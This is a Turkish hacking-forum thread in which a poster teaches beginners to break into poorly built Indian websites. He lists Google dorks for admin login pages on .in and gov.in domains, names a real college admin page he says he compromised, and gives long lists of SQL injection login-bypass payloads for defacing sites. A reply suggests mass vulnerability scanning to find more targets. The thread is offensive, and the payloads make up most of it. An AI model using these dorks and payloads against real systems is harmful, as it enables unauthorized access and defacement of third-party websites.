Basit şekilde web sitelerine sızmak

Srmx

Yeni üye
13 Ağu 2022
10
4
10 dan fazla sitenin admin paneline girebildiğini söylemiştin nasıl? ve nerden başladın acaba siber güvenliğe? admin paneline girdiğin zaman ne yapabiliyorsun mesela? yardımcı olabilir misin teşekkür ederim şimdiden
:-*


Şeklinde sormuştu
:D

bende detaylandırıp konu yapayım dedim zaten basit bir olay herkes faydalansın.

Öncelikle Hindistan 2 Milyara yaklaşmaya başlayan nüfusuyla gerçekten büyük bir ülke
Aynı Zamanda Fakir bir Ülke Bu da genel olarak sitelerinin bu fakirsizlikten kaynaklanması nedeniyle çoğu zaman çok ucuz ücretlere yapılıyor bu da başlangıç derecesinde bulunan hackerlara bir fırsat sunuyor.

Kötü kodlanmış site = Zaafiyetli site

Şöyle açıklayayım;
O kadar kötü yapılan siteler var ki 2024 yılına gireceğiz ve artık adını dahi almamamız gereken türden bir açık olan Admin Login bypass Açığın kullanacağız bu konumuzda

Welcome To Public College Samana şu siteye bir baksanıza
:D


Nadiren görülür ve çok basit bir şekilde exploit edilir.
admin login sayfasında sql payloadları çalıştırırız ve admin olarak o sayfayı, güvenliği atlayıp devam ederiz
bu da bize sitenin adminin genel olarak tüm yetkisini sunar.
peki bu zaafiyetli siteleri nasıl bulacağız?

Tabii ki dorkları kullanarak!

@Satana konusunda detaylı olarak gösterdi dorkların ne olduğunu bilmeyenler burada durup konuyu okuyup gelebilirler.
http://dydaofm5uefuulnzb63uh6coodgb....onion/index.php?topic=2991.msg48088#msg48088

Dorkları kullanarak genel olarak admin login pagelerini ve Hindistanı belirtecek anahtar kelimeleri kullanmamız gerekmekte.

Size Birkaç Dork Yazayım; inurl:admin.php inurl:.in
inurl:admin.html inurl:.in
inurl:admin inurl:.in
inurl:login/admin inurl:.in
inurl:login/admin inurl:.in
inurl:admin.asp inurl:.in
inurl:admin.aspx inurl:gov.in
inurl:login/admin.php inurl:gov.in
inurl:login/admin.asp inurl:gov.in
inurl:login/admin.aspx inurl:gov.in

Sadece 10 dakika içerisinde bu dorkları kullanarak
https://www.stet.edu.in/feedback/alumini/admin.php
bu sitenin

''Or'='Or''
anything' OR 'x'='x
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1–
''Or 1 = 1'
' or 1=1--
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
x' or 1=1 or 'x'='y
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or select *
admin'--
")) or (("x"))=(("x
" or ""+"
admin"or 1=1 or ""="
admin") or ("1"="1"--

payloadlarını kullanarak admin paneline giriş yaptım

fakat içerisinde herhangi bir dosya yükleyebileceğim ya da herhangi bir site sayfasını değiştirebileceğim bir yer bulunmadığı için es geçiyorum. sizde bu şekilde bir gününüzü ayırarak şanslıysanız 15 20 site düşürebilirsiniz ve bu sitelerden 3 tanesinde upload bölümü bulunsa dahi 3 index demek olucak kısa günün karı

Bu taktik "ilk indeximi basayım aga" diyenler içindi. gelişmek isteyenler bu taktiği kullanmak yerine daha kapsamlı açıkları kullanarak kendilerini bir üst seviyeye taşıyabilirler
Bu ve bunun gibi konuların devamı için konumu beğenirseniz mükemmel olur
 

Srmx

Yeni üye
13 Ağu 2022
10
4
10 dan fazla sitenin admin paneline girebildiğini söylemiştin nasıl? ve nerden başladın acaba siber güvenliğe? admin paneline girdiğin zaman ne yapabiliyorsun mesela? yardımcı olabilir misin teşekkür ederim şimdiden
:-*


Şeklinde sormuştu
:D

bende detaylandırıp konu yapayım dedim zaten basit bir olay herkes faydalansın.

Öncelikle Hindistan 2 Milyara yaklaşmaya başlayan nüfusuyla gerçekten büyük bir ülke
Aynı Zamanda Fakir bir Ülke Bu da genel olarak sitelerinin bu fakirsizlikten kaynaklanması nedeniyle çoğu zaman çok ucuz ücretlere yapılıyor bu da başlangıç derecesinde bulunan hackerlara bir fırsat sunuyor.

Kötü kodlanmış site = Zaafiyetli site

Şöyle açıklayayım;
O kadar kötü yapılan siteler var ki 2024 yılına gireceğiz ve artık adını dahi almamamız gereken türden bir açık olan Admin Login bypass Açığın kullanacağız bu konumuzda

Welcome To Public College Samana şu siteye bir baksanıza
:D


Nadiren görülür ve çok basit bir şekilde exploit edilir.
admin login sayfasında sql payloadları çalıştırırız ve admin olarak o sayfayı, güvenliği atlayıp devam ederiz
bu da bize sitenin adminin genel olarak tüm yetkisini sunar.
peki bu zaafiyetli siteleri nasıl bulacağız?

Tabii ki dorkları kullanarak!

@Satana konusunda detaylı olarak gösterdi dorkların ne olduğunu bilmeyenler burada durup konuyu okuyup gelebilirler.
http://dydaofm5uefuulnzb63uh6coodgb....onion/index.php?topic=2991.msg48088#msg48088

Dorkları kullanarak genel olarak admin login pagelerini ve Hindistanı belirtecek anahtar kelimeleri kullanmamız gerekmekte.

Size Birkaç Dork Yazayım; inurl:admin.php inurl:.in
inurl:admin.html inurl:.in
inurl:admin inurl:.in
inurl:login/admin inurl:.in
inurl:login/admin inurl:.in
inurl:admin.asp inurl:.in
inurl:admin.aspx inurl:gov.in
inurl:login/admin.php inurl:gov.in
inurl:login/admin.asp inurl:gov.in
inurl:login/admin.aspx inurl:gov.in

Sadece 10 dakika içerisinde bu dorkları kullanarak
https://www.stet.edu.in/feedback/alumini/admin.php
bu sitenin

''Or'='Or''
anything' OR 'x'='x
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1–
''Or 1 = 1'
' or 1=1--
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
x' or 1=1 or 'x'='y
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or select *
admin'--
")) or (("x"))=(("x
" or ""+"
admin"or 1=1 or ""="
admin") or ("1"="1"--

payloadlarını kullanarak admin paneline giriş yaptım

fakat içerisinde herhangi bir dosya yükleyebileceğim ya da herhangi bir site sayfasını değiştirebileceğim bir yer bulunmadığı için es geçiyorum. sizde bu şekilde bir gününüzü ayırarak şanslıysanız 15 20 site düşürebilirsiniz ve bu sitelerden 3 tanesinde upload bölümü bulunsa dahi 3 index demek olucak kısa günün karı

Bu taktik "ilk indeximi basayım aga" diyenler içindi. gelişmek isteyenler bu taktiği kullanmak yerine daha kapsamlı açıkları kullanarak kendilerini bir üst seviyeye taşıyabilirler
Bu ve bunun gibi konuların devamı için konumu beğenirseniz mükemmel olur
VE BUNLARDA DİĞER PAYLOADLAR

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2
*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|
1234
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
1234 ' AND 1=0 UNION ALL SELECT 'admin', '7110eda4d09e062aa5e4a390b0a572ac0d2c0220
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
1234 " AND 1=0 UNION ALL SELECT "admin", "7110eda4d09e062aa5e4a390b0a572ac0d2c0220
==
=
'
' --
' #
' –
'--
'/*
'#
" --
" #
"/*
' and 1='1
' and a='a
or true
' or ''='
" or ""="
1′) and '1′='1–
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
' AND 1=0 UNION ALL SELECT '', '7110eda4d09e062aa5e4a390b0a572ac0d2c0220
" AND 1=0 UNION ALL SELECT "", "7110eda4d09e062aa5e4a390b0a572ac0d2c0220
and 1=1
and 1=1–
' and 'one'='one
' and 'one'='one–
' group by password having 1=1--
' group by userid having 1=1--
' group by username having 1=1--
like '%'
or 0=0 --
or 0=0 #
or 0=0 –
' or 0=0 #
' or 0=0 --
' or 0=0 #
' or 0=0 –
" or 0=0 --
" or 0=0 #
" or 0=0 –
%' or '0'='0
or 1=1–
' or 1=1--
' or '1'='1
' or '1'='1'--
' or '1'='1'/*
' or '1'='1'#
' or '1′='1
' or 1=1
' or 1=1 --
' or 1=1 –
' or 1=1;#
' or 1=1/*
' or 1=1#
' or 1=1–
') or '1'='1
') or '1'='1--
') or '1'='1'--
') or '1'='1'/*
') or '1'='1'#
') or ('1'='1
') or ('1'='1--
') or ('1'='1'--
') or ('1'='1'/*
') or ('1'='1'#
'or'1=1
'or'1=1′
" or "1"="1
" or "1"="1"--
" or "1"="1"/*
" or "1"="1"#
" or 1=1
" or 1=1 --
" or 1=1 –
" or 1=1--
" or 1=1/*
" or 1=1#
" or 1=1–
") or "1"="1
") or "1"="1"--
") or "1"="1"/*
") or "1"="1"#
") or ("1"="1
") or ("1"="1"--
") or ("1"="1"/*
") or ("1"="1"#
) or '1′='1–
) or ('1′='1–
' or 1=1 LIMIT 1;#
'or 1=1 or ''='
"or 1=1 or ""="
' or a=a--
' or a=a–
" or "a"="a
") or ("a"="a
') or ('a'='a and hi") or ("a"="a
' or 'one'='one
' or 'one'='one–
' or uid like '%
' or uname like '%
' or userid like '%
' or user like '%
' or username like '%
') or ('x'='x
' OR 'x'='x'#;
'=' 'or' and '=' 'or'
' UNION ALL SELECT 1, @@version;#
' UNION ALL SELECT system_user(),user();#
' UNION select table_schema,table_name FROM information_Schema.tables;#
admin' and substring(password/text(),1,1)='7
' and substring(password/text(),1,1)='7
"
'-- 2
"-- 2
'='
0'&lt;'2
"="
0"&lt;"2
')
")
')-- 2
')/*
')#
")-- 2
") #
")/*
')-('
')&('
')^('
')*('
')=('
0')&lt;('2
")-("
")&("
")^("
")*("
")=("
0")&lt;("2
'-''-- 2
'-''#
'-''/*
'&''-- 2
'&''#
'&''/*
'^''-- 2
'^''#
'^''/*
'*''-- 2
'*''#
'*''/*
'=''-- 2
'=''#
'=''/*
0'&lt;'2'-- 2
0'&lt;'2'#
0'&lt;'2'/*
"-""-- 2
"-""#
"-""/*
"&""-- 2
"&""#
"&""/*
"^""-- 2
"^""#
"^""/*
"*""-- 2
"*""#
"*""/*
"=""-- 2
"=""#
"=""/*
0"&lt;"2"-- 2
0"&lt;"2"#
0"&lt;"2"/*
')-''-- 2
')-''#
')-''/*
')&''-- 2
')&''#
')&''/*
')^''-- 2
')^''#
')^''/*
')*''-- 2
')*''#
')*''/*
')=''-- 2
')=''#
')=''/*
0')&lt;'2'-- 2
0')&lt;'2'#
0')&lt;'2'/*
")-""-- 2
")-""#
")-""/*
")&""-- 2
")&""#
")&""/*
")^""-- 2
")^""#
")^""/*
")*""-- 2
")*""#
")*""/*
")=""-- 2
")=""#
")=""/*
0")&lt;"2-- 2
0")&lt;"2#
0")&lt;"2/*
'oR'2
'oR'2'-- 2
'oR'2'#
'oR'2'/*
'oR'2'oR'
'oR(2)-- 2
'oR(2)#
'oR(2)/*
'oR(2)oR'
'oR 2-- 2
'oR 2#
'oR 2/*
'oR 2 oR'
'oR/**/2-- 2
'oR/**/2#
'oR/**/2/*
'oR/**/2/**/oR'
"oR"2
"oR"2"-- 2
"oR"2"#
"oR"2"/*
"oR"2"oR"
"oR(2)-- 2
"oR(2)#
"oR(2)/*
"oR(2)oR"
 

powwerbangTR

Katılımcı Üye
25 Ağu 2017
513
117
Çok hazır cevap bir konu olmuş kusura bakmayın şimdiden diyeceklerim için.

Yapılması gereken şeyler var.

öncelikle rastgele site hacklemek isteyen arkadaşlar için dork tarayıcıları vardır bu dork tarayıcıları farklı kelimelerde olan title url header gibi gibi gibi olası çıkan arama motorlarındaki siteleri toplar.

yeterli gelmeyenler için ise özel software yada opensource (Açık kaynaklı) arama motorları bulunur bu arama motorları çoklu arama motorlarını proxy sayesinde farklı şekillerde bulduğu siteleri kaydeder.

Kaydedilen listeyi nereye koyabiliriz?

toplu sql açık tarama xss csrf yada fullscan tarama yapacak araçlarda kullanılabilir. örnek verelim Acunetix.

Kullanılan program bitişinde sadece kötü shelli siteleri değil çoğunlukla çalışan ve mesaj bırakmak isteyebileceğiniz sistemlerinde çok büyük olasılıkla 1 adet dahil olsa bulursunuz.

Gelelim anlam kavramlarına Acunetix de çıkan virüs analizlerini bilmiyorsanız kritik medium olan çıkışını yapan sistemlerin hepsini araştırarak nasıl yararlanabileceğinizi öğrenip çalışmalara başlayabilirsiniz.

Bu yöntemler çocukluk döneminden kalan eğitimlerdir bu tarz şeyleri yapmak öncelikle saçmadır yüz defa girilmiş sisteme girmek sizi tatmin etmez.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.